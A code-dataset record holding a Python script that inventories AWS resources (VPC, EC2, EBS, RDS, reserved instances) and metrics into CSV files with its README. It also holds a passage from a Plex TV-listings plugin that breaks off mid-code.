| 2021-05-22T00:18:42.243004 | 2020-04-20T19:46:14 | 2020-04-20T19:46:14 | 252,880,540 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7473347783088684,
"alphanum_fraction": 0.7547974586486816,
"avg_line_length": 23.710525512695312,
"blob_id": "fdacea6bcaf0877dc500a3e90a568982d00c0386",
"content_id": "03c3431e38c03ae0462d44d6bcf2f08562f0e29e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 938,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 38,
"path": "/README.md",
"repo_name": "aurbac/aws-summary",
"src_encoding": "UTF-8",
"text": "# AWS Summary\n\nAWS Summary for the following services:\n\n- VPC\n- Subnets\n- EC2 Instances + Compute Optimizer\n- EBS\n- Snapshots\n- Reserved EC2 Instances\n- RDS Instances\n- Reserved RDS Instances\n\n[Activate **Compute Optimizer** in order to have instace recommendations, data will be available few hours later](https://docs.aws.amazon.com/compute-optimizer/latest/ug/getting-started.html#account-opt-in).\n\nClone this github project and inside the folder execute the following commands.\n\n1\\. Install requirements.\n\n``` bash\npip install -t lib -r requirements.txt\n```\n\n2\\. Setting the environment variables with IAM credentials for your user (**with read only permissions**).\n\n``` bash\nexport AWS_ACCESS_KEY_ID=YOUR_AWS_ACCESS_KEY_ID\nexport AWS_SECRET_ACCESS_KEY=YOUR_AWS_SECRET_ACCESS_KEY\nexport AWS_DEFAULT_REGION=us-east-1\n```\n\n3\\. Execute the script.\n\n``` bash\npython aws_summary.py\n```\n\n4\\. You can find the results in **services** folder."
},
{
"alpha_fraction": 0.6806081533432007,
"alphanum_fraction": 0.6892191171646118,
"avg_line_length": 46.046295166015625,
"blob_id": "f5fcc6bceb76c34ba40485e76533017ae7cd278a",
"content_id": "5ba8849ed2ba73611d06288c377e03a1bae0fcb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20323,
"license_type": "no_license",
"max_line_length": 373,
"num_lines": 432,
"path": "/aws_summary.py",
"repo_name": "aurbac/aws-summary",
"src_encoding": "UTF-8",
"text": "'''\n Author: Uriel Ramirez\n Email: [email protected]\n'''\nimport boto3\nfrom datetime import datetime, timedelta\nimport time\nimport botocore\nimport ssl\nimport os\nimport json\nimport pandas as pd\nimport os.path\nfrom os import path\n\nfrom botocore.exceptions import ClientError\nfrom boto3 import Session\n\nif 'AWS_ACCESS_KEY_ID' in os.environ:\n\tAWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']\nif 'AWS_SECRET_ACCESS_KEY' in os.environ:\n\tAWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']\nif 'AWS_DEFAULT_REGION' in os.environ:\n\tAWS_DEFAULT_REGION = os.environ['AWS_DEFAULT_REGION']\n\ndef describeServiceItems( client , describe_function, key_items, filters=\"\", next_step=\"\"):\n\ttry:\n\t\tif (next_step!=\"\"):\n\t\t\t#print(\"Filters - \" + filters)\n\t\t\tfilters_to_add = \"\"\n\t\t\tif filters != \"\":\n\t\t\t\tfilters_to_add = \", \"+filters\n\t\t\tif describe_function==\"list_resource_record_sets\":\n\t\t\t\tstrfunction = \"client.\"+describe_function+\"(StartRecordName='\"+next_step+\"'\"+filters_to_add+\")\"\n\t\t\telse:\n\t\t\t\tstrfunction = \"client.\"+describe_function+\"(NextToken='\"+next_step+\"'\"+filters_to_add+\")\"\n\t\t\t#print(\"1 - \" + strfunction)\n\t\t\tresponse = eval(strfunction)\n\t\telse:\n\t\t\tstrfunction = \"client.\"+describe_function+\"(\"+filters+\")\"\n\t\t\t#print(\"2 - \" + strfunction)\n\t\t\tresponse = eval(strfunction)\n\t\tlistItems = []\n\t\tif not key_items in response or len(response[key_items])<=0:\n\t\t\treturn False\n\t\telse:\n\t\t\tlistItems = response[key_items]\n\t\t##print(\"\");\n\t\tif 'NextToken' in response:\n\t\t\t#print(\"go 1\")\n\t\t\tlistItems += describeServiceItems(client, describe_function, key_items, filters, response['NextToken'])\n\t\tif 'NextRecordName' in response:\n\t\t\t#print(\"go 2\")\n\t\t\tlistItems += describeServiceItems(client, describe_function, key_items, filters, response['NextRecordName'])\n\t\treturn listItems\n\texcept botocore.exceptions.EndpointConnectionError as e:\n\t\tprint(e)\n\t\treturn False\n\texcept ClientError as e:\n\t\tprint(e)\n\t\treturn False\n\t\t\ndef isTrueOrFalse( bool_vale ):\n\tif bool_vale:\n\t\treturn \"True\"\n\telse:\n\t\treturn \"False\"\n\n\ndef getExistsValueKey( item, keyname ):\n\tif keyname in item:\n\t\treturn item[keyname]\n\telse:\n\t\treturn \"\"\n\n\ndef existsKey( item, keyname ):\n\tif keyname in item:\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef getValueTag( items, keyname ):\n\tfor item in items:\n\t\tif item['Key'] == keyname:\n\t\t\treturn item['Value']\n\treturn \"\"\n\t\t\ndef getValueFromArray(items):\n\tstrVO = \"\"\n\tfor index, item in enumerate(items):\n\t\tif index < len(items) and index > 0:\n\t\t\tstrVO += \", \"\n\t\tstrVO += item\n\treturn strVO\n\t\ndef getRoleFromProfile (item):\n\tstrRole = \"\"\n\tif item!=\"\":\n\t\tvalues = item['Arn'].split(\":\")\n\t\treturn values[5].split(\"/\")[1]\n\telse:\n\t\treturn strRole\n\ndef isValueInArray(value, items, key):\n\tfor item in items:\n\t\tif key in item:\n\t\t\tif item[key]==value:\n\t\t\t\treturn True\n\treturn False\n\t\ndef getItemFromArray(key, value, items):\n\tfor item in items:\n\t\tif key in item and item[key]==value:\n\t\t\treturn item\n\treturn False\n\t\t\nsession = Session(aws_access_key_id=AWS_ACCESS_KEY_ID, aws_secret_access_key=AWS_SECRET_ACCESS_KEY, region_name=AWS_DEFAULT_REGION)\n\n\npath_folder = \"./services\"\nif not path.exists(path_folder):\n\tos.mkdir(path_folder)\n\naccount_id = boto3.client('sts').get_caller_identity().get('Account')\n\n######################################################################\n###################################################################### AMAZON VPC\n######################################################################\n\nclient = session.client('ec2')\n\nresponseVpcs = describeServiceItems(client, \"describe_vpcs\", \"Vpcs\")\nif responseVpcs:\n\tdataVpcs = []\n\tfor item in responseVpcs:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['Name'] = getValueTag( getExistsValueKey(item, 'Tags'), \"Name\")\n\t\titem_service['VpcId'] = item['VpcId']\n\t\titem_service['State'] = item['State']\n\t\titem_service['CidrBlock'] = item['CidrBlock']\n\t\titem_service['DhcpOptionsId'] = item['DhcpOptionsId']\n\t\titem_service['InstanceTenancy'] = item['InstanceTenancy']\n\t\titem_service['IsDefault'] = isTrueOrFalse(item['IsDefault'])\n\t\tdataVpcs.append(item_service)\n\tdf = pd.DataFrame(dataVpcs)\n\tdf.to_csv(path_folder+'/vpc_vpcs.csv', index=False)\n\nresponseSubnets = describeServiceItems(client, \"describe_subnets\", \"Subnets\")\nif responseSubnets:\n\tdataSubnets = []\n\tfor item in responseSubnets:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['Name'] = getValueTag( getExistsValueKey(item, 'Tags'), \"Name\")\n\t\titem_service['SubnetId'] = item['SubnetId']\n\t\titem_service['State'] = item['State']\n\t\titem_service['VpcId'] = item['VpcId']\n\t\titem_service['CidrBlock'] = item['CidrBlock']\n\t\titem_service['AvailableIpAddressCount'] = str(item['AvailableIpAddressCount'])\n\t\titem_service['AvailabilityZone'] = item['AvailabilityZone']\n\t\titem_service['DefaultForAz'] = isTrueOrFalse(item['DefaultForAz'])\n\t\tdataSubnets.append(item_service)\n\tdf = pd.DataFrame(dataSubnets)\n\tdf.to_csv(path_folder+'/vpc_subnets.csv', index=False)\n\n######################################################################\n###################################################################### AMAZON EC2\n######################################################################\n\nclient_cw = session.client('cloudwatch')\nclient_co = session.client('compute-optimizer')\n\nresponseInstanceRecommendations = describeServiceItems(client_co, \"get_ec2_instance_recommendations\", \"instanceRecommendations\", \" filters=[ { 'name': 'Finding', 'values': ['Overprovisioned','Overprovisioned','Optimized']}] \")\n\nresponseInstances = describeServiceItems(client, \"describe_instances\", \"Reservations\")\nif responseInstances:\n\tdataInstances = []\n\tfor reservation in responseInstances:\n\t\tfor instance in reservation['Instances']:\n\t\t\titem_service = {}\n\t\t\titem_service['AccountId'] = account_id\n\t\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\t\titem_service['InstanceId'] = instance['InstanceId']\n\t\t\titem_service['State'] = instance['State']['Name']\n\t\t\titem_service['Name'] = getValueTag( getExistsValueKey(instance, 'Tags'), \"Name\")\n\t\t\titem_service['InstanceType'] = instance['InstanceType']\n\t\t\titem_service['LaunchTime'] = instance['LaunchTime']\n\t\t\titem_service['VirtualizationType'] = instance['VirtualizationType']\n\t\t\titem_service['EbsOptimized'] = isTrueOrFalse(instance['EbsOptimized'])\n\t\t\titem_service['EnaSupport'] = getExistsValueKey(instance, 'EnaSupport')\n\t\t\titem_service['KeyName'] = getExistsValueKey(instance, 'KeyName')\n\t\t\tif getExistsValueKey(instance,'Platform').lower()==\"windows\":\n\t\t\t\titem_service['Platform'] = \"Windows\"\n\t\t\telse:\n\t\t\t\titem_service['Platform'] = \"Linux\"\n\t\t\titem_service['PrivateIpAddress'] = str(instance['PrivateIpAddress'])\n\t\t\titem_service['PublicIpAddress'] = getExistsValueKey(instance, 'PublicIpAddress')\n\t\t\titem_service['SubnetId'] = str(instance['SubnetId'])\n\t\t\titem_service['VpcId'] = str(instance['VpcId'])\n\t\t\titem_service['IamInstanceProfile'] = getRoleFromProfile(getExistsValueKey(instance, 'IamInstanceProfile'))\n\t\t\tstart_time = datetime.today() - timedelta(days=14)\n\t\t\tend_time = datetime.today()\n\t\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/EC2', MetricName='CPUUtilization', Dimensions=[ { 'Name' : 'InstanceId', 'Value': '\"+instance['InstanceId']+\"' } ], Period=86400, Statistics=['Average'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Percent'\")\n\t\t\tif responseDatapoints:\n\t\t\t\ttotal = 0\n\t\t\t\tfor data_point in responseDatapoints:\n\t\t\t\t\t#item_service['Avg-'+data_point['Timestamp'].strftime(\"%y-%m-%d\")] = round(data_point['Average'],2)\n\t\t\t\t\ttotal += data_point['Average']\n\t\t\t\titem_service['CPU-Total-Avg-14days'] = round(total/len(responseDatapoints),2)\n\t\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/EC2', MetricName='CPUUtilization', Dimensions=[ { 'Name' : 'InstanceId', 'Value': '\"+instance['InstanceId']+\"' } ], Period=86400, Statistics=['Maximum'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Percent'\")\n\t\t\tif responseDatapoints:\n\t\t\t\ttotal = 0\n\t\t\t\tfor data_point in responseDatapoints:\n\t\t\t\t\t#item_service['Max-'+data_point['Timestamp'].strftime(\"%y-%m-%d\")] = round(data_point['Maximum'],2)\n\t\t\t\t\ttotal += data_point['Maximum']\n\t\t\t\titem_service['CPU-Total-Avg-Max-14days'] = round(total/len(responseDatapoints),2)\n\t\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/EC2', MetricName='NetworkIn', Dimensions=[ { 'Name' : 'InstanceId', 'Value': '\"+instance['InstanceId']+\"' } ], Period=86400, Statistics=['Sum'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Bytes'\")\n\t\t\tif responseDatapoints:\n\t\t\t\ttotal = 0\n\t\t\t\tfor data_point in responseDatapoints:\n\t\t\t\t\ttotal += data_point['Sum']\n\t\t\t\titem_service['NetIn-Total-Gigabytes-14days'] = round(total/1000000000,2)\n\t\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/EC2', MetricName='NetworkOut', Dimensions=[ { 'Name' : 'InstanceId', 'Value': '\"+instance['InstanceId']+\"' } ], Period=86400, Statistics=['Sum'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Bytes'\")\n\t\t\tif responseDatapoints:\n\t\t\t\ttotal = 0\n\t\t\t\tfor data_point in responseDatapoints:\n\t\t\t\t\ttotal += data_point['Sum']\n\t\t\t\titem_service['NetOut-Total-Gigabytes-14days'] = round(total/1000000000,2)\n\t\t\tif responseInstanceRecommendations:\n\t\t\t\tinstance_recommendation = getItemFromArray('instanceArn','arn:aws:ec2:'+AWS_DEFAULT_REGION+':'+account_id+':instance/'+instance['InstanceId'],responseInstanceRecommendations)\n\t\t\t\tif instance_recommendation:\n\t\t\t\t\titem_service['Finding'] = instance_recommendation['finding']\n\t\t\t\t\tfor option in instance_recommendation['recommendationOptions']:\n\t\t\t\t\t\titem_service['RecommendedInstanceType'+str(option['rank'])] = option['instanceType']\n\t\t\tdataInstances.append(item_service)\n\tdf = pd.DataFrame(dataInstances)\n\tdf.to_csv(path_folder+'/ec2_instances.csv', index=False)\n\nresponseVolumes = describeServiceItems(client, \"describe_volumes\", \"Volumes\")\nif responseVolumes:\n\tdataVolumes = []\n\tfor item in responseVolumes:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['VolumeId'] = item['VolumeId']\n\t\titem_service['VolumeType'] = item['VolumeType']\n\t\titem_service['Size'] = str(item['Size'])\n\t\titem_service['State'] = str(item['State'])\n\t\tif 'Attachments' in item and len(item['Attachments'])>0:\n\t\t\titem_service['InstanceIdAttachment'] = getExistsValueKey(item['Attachments'][0], 'InstanceId')\n\t\t\titem_service['StateAttachment'] = isTrueOrFalse(getExistsValueKey(item['Attachments'][0], 'State'))\n\t\t\titem_service['DeviceAttachment'] = getExistsValueKey(item['Attachments'][0], 'Device')\n\t\t\titem_service['DeleteOnTerminationAttachment'] = isTrueOrFalse(getExistsValueKey(item['Attachments'][0], 'DeleteOnTermination'))\n\t\titem_service['Encrypted'] = isTrueOrFalse(item['Encrypted'])\n\t\tresponseVolumeSnapshots = describeServiceItems(client, \"describe_snapshots\", \"Snapshots\", \" Filters = [{ 'Name' : 'volume-id', 'Values' : [ '\"+item['VolumeId']+\"' ] }]\")\n\t\tif responseVolumeSnapshots:\n\t\t\titem_service['Snapshots'] = len(responseVolumeSnapshots)\n\t\t\tcurrent_time = time.mktime(datetime.utcnow().timetuple())\n\t\t\tmax_time_snapshot = 0\n\t\t\tmax_date_string = \"\"\n\t\t\tdifference_time = 0\n\t\t\tfor itemS in responseVolumeSnapshots:\n\t\t\t\tstarted_time = time.mktime(itemS['StartTime'].timetuple())\n\t\t\t\tif started_time>max_time_snapshot:\n\t\t\t\t\tmax_time_snapshot = started_time\n\t\t\t\t\tmax_date_string = itemS['StartTime'].strftime(\"%Y-%m-%d %H:%m\")\n\t\t\t\t\tdifference_time = current_time - started_time\n\t\t\titem_service['LastSnapshot'] = max_date_string\n\t\telse:\n\t\t\titem_service['Snapshots'] = 0\n\t\t\titem_service['LastSnapshot'] = \"\"\n\t\tdataVolumes.append(item_service)\n\tdf = pd.DataFrame(dataVolumes)\n\tdf.to_csv(path_folder+'/ec2_volumes.csv', index=False)\n\n\nresponseSnapshots = describeServiceItems(client, \"describe_snapshots\", \"Snapshots\", \" Filters = [{ 'Name' : 'owner-id', 'Values' : [ '\"+account_id+\"' ] }]\")\nif responseSnapshots:\n\tdataSnapshots = []\n\tfor item in responseSnapshots:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['SnapshotId'] = item['SnapshotId']\n\t\titem_service['StartTime'] = item['StartTime'].strftime(\"%Y-%m-%d %H:%m\")\n\t\titem_service['State'] = item['State']\n\t\titem_service['Progress'] = item['Progress']\n\t\titem_service['VolumeId'] = item['VolumeId']\n\t\titem_service['VolumeSize'] = item['VolumeSize']\n\t\titem_service['Description'] = item['Description']\n\t\titem_service['Encrypted'] = item['Encrypted']\n\t\titem_service['VolumeExists'] = isValueInArray(item['VolumeId'],dataVolumes,'VolumeId')\n\t\tdataSnapshots.append(item_service)\n\tdf = pd.DataFrame(dataSnapshots)\n\tdf.to_csv(path_folder+'/ec2_snapshots.csv', index=False)\n\nresponseReservedInstances = describeServiceItems(client, \"describe_reserved_instances\", \"ReservedInstances\")\nif responseReservedInstances:\n\tdataReservedInstances = []\n\tfor item in responseReservedInstances:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\tri_scope = item['Scope']\n\t\tif existsKey(item, 'AvailabilityZone'):\n\t\t\tri_scope = ri_scope + \" - \" + item['AvailabilityZone']\n\t\titem_service['ReservedInstancesId'] = str(item['ReservedInstancesId'])\n\t\titem_service['InstanceCount'] = str(item['InstanceCount'])\n\t\titem_service['InstanceType'] = item['InstanceType']\n\t\titem_service['Scope'] = ri_scope\n\t\titem_service['State'] = item['State']\n\t\titem_service['Duration'] = str(item['Duration']/60/60/24)\n\t\titem_service['OfferingClass'] = item['OfferingClass']\n\t\titem_service['OfferingType'] = item['OfferingType']\n\t\titem_service['Start'] = item['Start'].strftime(\"%Y-%m-%d %H:%m\")\n\t\titem_service['End'] = item['End'].strftime(\"%Y-%m-%d %H:%m\")\n\t\titem_service['ProductDescription'] = item['ProductDescription']\n\t\titem_service['UsagePrice'] = item['UsagePrice']\n\t\titem_service['CurrencyCode'] = str(item['CurrencyCode'])\n\t\titem_service['FixedPrice'] = item['FixedPrice']\n\t\tstr_charge = ''\n\t\tc = 0\n\t\tfor charge in item['RecurringCharges']:\n\t\t\tif c < len(item['RecurringCharges']) and c > 0:\n\t\t\t\tstr_charge += \" | \"\n\t\t\tstr_charge = str_charge + \"Amount:\" + str(charge['Amount']) + ' _ ' + \"Frequency\" + charge['Frequency']\n\t\t\tc = c +1\n\t\titem_service['RecurringCharges'] = str_charge\n\t\tdataReservedInstances.append(item_service)\n\tdf = pd.DataFrame(dataReservedInstances)\n\tdf.to_csv(path_folder+'/ec2_reserved_instances.csv', index=False)\n\n######################################################################\n###################################################################### AMAZON RDS\n######################################################################\n\nclient = session.client('rds')\n\nresponseDBInstances = describeServiceItems(client, \"describe_db_instances\", \"DBInstances\")\nif responseDBInstances:\n\tdataDBInstances = []\n\tfor item in responseDBInstances:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['DBInstanceIdentifier'] = item[\"DBInstanceIdentifier\"]\n\t\titem_service['DBName'] = getExistsValueKey(item, \"DBName\")\n\t\titem_service['MasterUsername'] = item[\"MasterUsername\"]\n\t\titem_service['Engine'] = item[\"Engine\"]\n\t\titem_service['EngineVersion'] = item[\"EngineVersion\"]\n\t\titem_service['LicenseModel'] = item[\"LicenseModel\"]\n\t\titem_service['MultiAZ'] = isTrueOrFalse(item[\"MultiAZ\"])\n\t\titem_service['AvailabilityZone'] = item[\"AvailabilityZone\"]\n\t\titem_service['PubliclyAccessible'] = isTrueOrFalse(item[\"PubliclyAccessible\"])\n\t\titem_service['DBInstanceClass'] = item[\"DBInstanceClass\"]\n\t\titem_service['StorageType'] = item[\"StorageType\"]\n\t\titem_service['AllocatedStorage'] = str(item[\"AllocatedStorage\"])\n\t\titem_service['StorageEncrypted'] = isTrueOrFalse(item[\"StorageEncrypted\"])\n\t\titem_service['BackupRetentionPeriod'] = str(item[\"BackupRetentionPeriod\"])\n\t\titem_service['InstanceCreateTime'] = str(item[\"InstanceCreateTime\"])\n\t\tif \"Endpoint\" in item:\n\t\t\titem_service['Endpoint'] = item[\"Endpoint\"][\"Address\"]\n\t\t\titem_service['Port'] = str(item[\"Endpoint\"][\"Port\"])\n\t\telse:\n\t\t\titem_service['Endpoint'] = ''\n\t\t\titem_service['Port'] = ''\n\t\t\n\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/RDS', MetricName='CPUUtilization', Dimensions=[ { 'Name' : 'DBInstanceIdentifier', 'Value': '\"+item[\"DBInstanceIdentifier\"]+\"' } ], Period=86400, Statistics=['Average'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Percent'\")\n\t\tif responseDatapoints:\n\t\t\ttotal = 0\n\t\t\tfor data_point in responseDatapoints:\n\t\t\t\ttotal += data_point['Average']\n\t\t\titem_service['CPU-Total-Avg-14days'] = round(total/len(responseDatapoints),2)\n\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/RDS', MetricName='CPUUtilization', Dimensions=[ { 'Name' : 'DBInstanceIdentifier', 'Value': '\"+item[\"DBInstanceIdentifier\"]+\"' } ], Period=86400, Statistics=['Maximum'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Percent'\")\n\t\tif responseDatapoints:\n\t\t\ttotal = 0\n\t\t\tfor data_point in responseDatapoints:\n\t\t\t\ttotal += data_point['Maximum']\n\t\t\titem_service['CPU-Total-Avg-Max-14days'] = round(total/len(responseDatapoints),2)\n\t\t\t\n\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/RDS', MetricName='FreeableMemory', Dimensions=[ { 'Name' : 'DBInstanceIdentifier', 'Value': '\"+item[\"DBInstanceIdentifier\"]+\"' } ], Period=86400, Statistics=['Average'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Bytes'\")\n\t\tif responseDatapoints:\n\t\t\ttotal = 0\n\t\t\tfor data_point in responseDatapoints:\n\t\t\t\ttotal += data_point['Average']\n\t\t\titem_service['FreeableMemory-Total-Avg-14days'] = round((total/len(responseDatapoints))/1000000000,2)\n\t\tresponseDatapoints = describeServiceItems(client_cw, \"get_metric_statistics\", \"Datapoints\", \" Namespace='AWS/RDS', MetricName='FreeableMemory', Dimensions=[ { 'Name' : 'DBInstanceIdentifier', 'Value': '\"+item[\"DBInstanceIdentifier\"]+\"' } ], Period=86400, Statistics=['Maximum'], StartTime=datetime.today() - timedelta(days=14), EndTime=datetime.today(), Unit='Bytes'\")\n\t\tif responseDatapoints:\n\t\t\ttotal = 0\n\t\t\tfor data_point in responseDatapoints:\n\t\t\t\ttotal += data_point['Maximum']\n\t\t\titem_service['FreeableMemory-Total-Avg-Max-14days'] = round((total/len(responseDatapoints))/1000000000,2)\n\t\t\t\n\t\tdataDBInstances.append(item_service)\n\tdf = pd.DataFrame(dataDBInstances)\n\tdf.to_csv(path_folder+'/rds_instances.csv', index=False)\n\nresponseReservedDBInstances = describeServiceItems(client, \"describe_reserved_db_instances\", \"ReservedDBInstances\")\nif responseReservedDBInstances:\n\tdataReservedDBInstances = []\n\tfor item in responseReservedDBInstances:\n\t\titem_service = {}\n\t\titem_service['AccountId'] = account_id\n\t\titem_service['Region'] = AWS_DEFAULT_REGION\n\t\titem_service['DBInstanceCount'] = item[\"DBInstanceCount\"]\n\t\titem_service['DBInstanceClass'] = item[\"DBInstanceClass\"]\n\t\titem_service['StartTime'] = item[\"StartTime\"].strftime(\"%Y-%m-%d %H:%m\")\n\t\titem_service['Duration'] = item[\"Duration\"]\n\t\titem_service['FixedPrice'] = item[\"FixedPrice\"]\n\t\titem_service['UsagePrice'] = item[\"UsagePrice\"]\n\t\titem_service['CurrencyCode'] = item[\"CurrencyCode\"]\n\t\titem_service['ProductDescription'] = item[\"ProductDescription\"]\n\t\titem_service['OfferingType'] = item[\"OfferingType\"]\n\t\titem_service['MultiAZ'] = isTrueOrFalse(item[\"MultiAZ\"])\n\t\titem_service['State'] = item[\"State\"]\n\t\titem_service['LeaseId'] = item[\"LeaseId\"]\n\t\tstr_charge = ''\n\t\tc = 0\n\t\tfor charge in item['RecurringCharges']:\n\t\t\tif c < len(item['RecurringCharges']) and c > 0:\n\t\t\t\tstr_charge += \" | \"\n\t\t\tstr_charge = str_charge + \"Amount:\" + str(charge['RecurringChargeAmount']) + ' _ ' + \"Frequency\" + charge['RecurringChargeFrequency']\n\t\t\tc = c +1\n\t\titem_service['RecurringCharges'] = str_charge\n\t\tdataDBInstances.append(item_service)\n\tdf = pd.DataFrame(dataReservedDBInstances)\n\tdf.to_csv(path_folder+'/rds_reserved_instances.csv', index=False)"
}
] | 2 |
PlexHaxx/plex.zap2it
|
https://github.com/PlexHaxx/plex.zap2it
|
8ad7a37f7f7ef3122dba1e4f1db3ade6ec6f9f75
|
8fddbd2bd9a3b943589f304da85a569a8aa10b12
|
4d55dc2ea7261f505e3495689063cc0e95e4e88f
|
refs/heads/master
| 2021-01-17T21:48:20.465701 | 2009-06-03T20:30:43 | 2009-06-03T20:30:43 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6532333493232727,
"alphanum_fraction": 0.6879100203514099,
"avg_line_length": 17.719297409057617,
"blob_id": "152074ad6b0ba73e09cb5e05b09b3fbd84b62e79",
"content_id": "fbc4a454d0808d0f99733feaf056dda29c508069",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1067,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 57,
"path": "/README.mkd",
"repo_name": "PlexHaxx/plex.zap2it",
"src_encoding": "UTF-8",
"text": "###Plex Plugin Name###\nZap2it\n\n###Author and Contact Information###\nspaceman\n\n###Category###\nVideos\n\n###Description###\nElectronic Programming Guide for Canada and USA\n\n###Version###\n0.10 uploaded April 22nd 2009\n\n###Change Log###\n####Version 0.1####\n* initial version\n\n####Version 0.2####\n* fixed midnight GMT issue\n\n####Version 0.3####\n* fixed 25 o'clock being displayed as midnight approaches\n\n####Version 0.4####\n* added option for 12 hour time format\n\n####Version 0.5####\n* added option to show/hide programmes in progress\n* improved caching\n* various fixes\n\n####Version 0.6####\n* Main menu shows next 12 hours\n* Added menu for next seven days\n\n####Version 0.7####\n* Hide and show selected channels\n\n####Version 0.8####\n* Search\n\n####Version 0.9####\n* Favourite shows float to top of list\n* Search fixes\n\n####Version 0.10####\n* Option to hide same show on different channels\n* Fixes for end times and in progress dupes\n\n###Setup###\n* Choose Settings\n* Enter your ZIP or Postal Code\n* Select your provider\n* Select your preferred time format\n* Return to main menu\n"
},
{
"alpha_fraction": 0.5805011987686157,
"alphanum_fraction": 0.5918146371841431,
"avg_line_length": 36.860069274902344,
"blob_id": "1b64dfcce09364b6b407e8418b2a42fe7e146718",
"content_id": "c982f8b1662e8aed93766864274d53157dcae4a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 22186,
"license_type": "no_license",
"max_line_length": 183,
"num_lines": 586,
"path": "/Zap2it.bundle/Contents/Code/__init__.py",
"repo_name": "PlexHaxx/plex.zap2it",
"src_encoding": "UTF-8",
"text": "from PMS import *\nfrom PMS.Objects import *\nfrom PMS.Shortcuts import *\n\nimport re, string, datetime, time, calendar, pickle, operator\n\nPLUGIN_PREFIX = '/video/zap2it'\nDAY_PREFIX = PLUGIN_PREFIX + '/day'\nSEARCH_PREFIX = PLUGIN_PREFIX + '/search'\nPROVIDER_INDEX = 'http://tvlistings.zap2it.com/tvlistings/ZCGrid.do?aid=zap2it&isDescriptionOn=true'\nSEARCH_INDEX = 'http://tvlistings.zap2it.com/tvlistings/ZCSearch.do?searchType=simple&searchTerm='\nSHOW_INDEX = 'http://tvlistings.zap2it.com'\nDAY = 86400\nCACHE_TIME = DAY\n\n# art-default from http://www.flickr.com/photos/kchrist/117806012\n# licensed as CC Attribution-Noncommercial 2.0 Generic\n\n####################################################################################################\n\ndef Start():\n Plugin.AddPrefixHandler(PLUGIN_PREFIX, MainMenu, L('Zap2it'), 'icon-default.gif', 'art-default.jpg')\n \n Plugin.AddViewGroup('Details', viewMode='InfoList', mediaType='items')\n Plugin.AddViewGroup('EpisodeList', viewMode='Episodes', mediaType='items')\n \n MediaContainer.title1 = L('Zap2it')\n MediaContainer.viewGroup = 'EpisodeList'\n MediaContainer.art = R('art-default.jpg')\n \n HTTP.SetCacheTime(CACHE_TIME)\n \n####################################################################################################\n\ndef CreateDict():\n Dict.Set('shows', dict())\n \ndef CreatePrefs():\n addPref('channels', 'text', dict(), L('Channels')) # dict\n addPref('postalCode', 'text', '', L('Postal Code'))\n addPref('provider', 'text', '', L('Provider'))\n addPref('timeFormat', 'text', '24', L('Time Format'))\n addPref('collapseShows', 'text', False, L('Collapse Shows'))\n addPref('inProgress', 'text', True, L('In Progress')) # bool\n addPref('favourites', 'text', list(), L('Favourites')) # list\n \n####################################################################################################\n\ndef UpdateCache():\n # Get TV Page\n if getPref('postalCode') == '' or getPref('provider') == '' or getPref('timeFormat') == '':\n return\n now = getCurrentTimeSlot()\n \n shows = Dict.Get('shows')\n if shows == None:\n Dict.Set('shows', dict())\n shows = Dict.Get('shows')\n \n # remove old slots\n for slot in shows.iterkeys():\n if slot < now: del shows[slot]\n \n # populate new slots\n for slot in range(now, now + DAY, 3 * 3600):\n grabListings(slot, shows)\n\n # populate channel dict\n channels = getPref('channels')\n if type(channels) != type(dict):\n channels = dict()\n\n url = PROVIDER_INDEX + '&zipcode=' + getPref('postalCode') + '&lineupId=' + getPref('provider')\n for td in GetXML(url, True).xpath('//td[starts-with(@class,\"zc-st\")]'):\n channelNum = int(td.xpath('descendant::span[@class=\"zc-st-n\"]')[0].text)\n channelName = td.xpath('descendant::span[@class=\"zc-st-c\"]')[0].text\n if not 